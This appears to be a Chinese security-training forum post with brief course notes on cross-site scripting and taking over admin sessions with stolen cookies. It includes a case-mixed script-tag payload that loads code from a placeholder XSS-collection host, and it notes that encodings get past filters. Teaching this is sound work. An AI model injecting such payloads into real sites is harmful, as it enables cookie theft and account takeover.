2.3、Xss跨站脚本攻击— 通过cookie伪造目标权限【直播回放-课件贴】

admin   ·   发表于 2018-03-29 00:24:43   ·   CTF&WP专版


PPT、课程直播、回放已打包至附件! 

直播回放观看:https://ke.qq.com/course/275794?tuin=62e148

解压密码:zkaq.org


1、如何防御xss? 在关键字符上进行转义输出

   我们在进行数据库下载的时候,将databse下载了下来,读了管理员密码,&#%@不能被URL正常解析的。

2、<>→lg、gt 是可以被当作正常解析的

3、当我们进行注入绕过、XSS绕过的时候,也会用到非常多的编码手段进行绕过。这些编码能够让过滤认不出来,但浏览器能够正常识别

4、<sCRiPt sRC=XSS平台的链接></sCrIpT>


打赏我,让我更有动力~

附件列表

3-4.7z   文件大小:1.491M (下载次数:46)   售价:2

9 条回复   |  直到 2019-7-29 | 6021 次浏览

jiedu520
发表于 2018-4-1

上边的连接失效了?

评论列表

  • 加载数据中...

编写评论内容

pklong007
发表于 2018-4-2

上面的连接的确失效了,附件的还回放也打不开

评论列表

  • 加载数据中...

编写评论内容

admin
发表于 2018-4-2

可以正常使用哦!大家刷新一下帖子

评论列表

  • 加载数据中...

编写评论内容

1270808374
发表于 2018-4-27

6666

评论列表

  • 加载数据中...

编写评论内容

ton2018
发表于 2018-9-5

666666666666666666666666666666666666666666

评论列表

  • 加载数据中...

编写评论内容

864691690
发表于 2018-11-18

下载一下

评论列表

  • 加载数据中...

编写评论内容

zhao9170
发表于 2019-1-7

66666666

评论列表

  • 加载数据中...

编写评论内容

太期待丶
发表于 2019-4-23

机器人是不是坏了  插入xss代码之后拿不到管理员访问的cookie

评论列表

  • 加载数据中...

编写评论内容

guren
发表于 2019-7-29

试试

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.